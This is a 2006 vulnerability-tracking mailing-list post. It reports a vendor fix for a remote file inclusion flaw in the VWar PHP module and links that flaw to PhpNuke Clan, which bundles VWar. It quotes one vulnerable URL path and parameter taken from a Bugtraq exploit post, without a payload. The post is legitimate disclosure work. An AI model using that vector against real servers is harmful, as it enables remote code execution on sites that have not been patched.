[VIM] Vendor ACK for VWar issue - VWar used by PhpNuke Clan
Steven M. Christey
coley at mitre.org
Mon Apr 3 23:08:59 EDT 2006
Vendor has provided ACK and fix for CVE-2006-1503.
The front page of the VWar web site (http://www.vwar.de/) says:
31.03.2006 18:07
ATTENTION: MAJOR SECURITY UPDATE
This vulnerability has been reported on securityfocus.com. We
recommend to replace the file functions_install.php as soon as
possible.
fixed: XSS bug in functions_install.php which could allow malicious
users to include a (remote) file and eg. execute php commands on the
server hosting vwar
Obviously, the developer is referring to file inclusion and not "XSS"
Also, for those who care, the following PhpNuke Clan web announcement
shows that it uses VWar as a module:
http://www.codezwiz.com/article492-phpnuke-clan-210-has-been-released.html
"PHPNUKE-CLAN.COM Release the new version of PNC! The version 2.1.0
With VWAR & Server Viewer installed on it! The installation are
simplified, more block for VWAR and JAG Online for the User Info
blocks! "
This could be relevant for this Bugtraq post:
BUGTRAQ:20060401 PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
http://www.securityfocus.com/archive/1/archive/1/429615/100/0/threaded
since the demonstration URL here shows the VWar relationship:
modules/vWar_Account/includes/functions_common.php?vwar_root2=
HOWEVER: since the include file and parameter name are different than
original reported vectors for VWar, this could be a separate issue.
PHPNuke Clan requires registration to download, and so does vWar, so I
didn't investigate any further.
- Steve
More information about the VIM
mailing list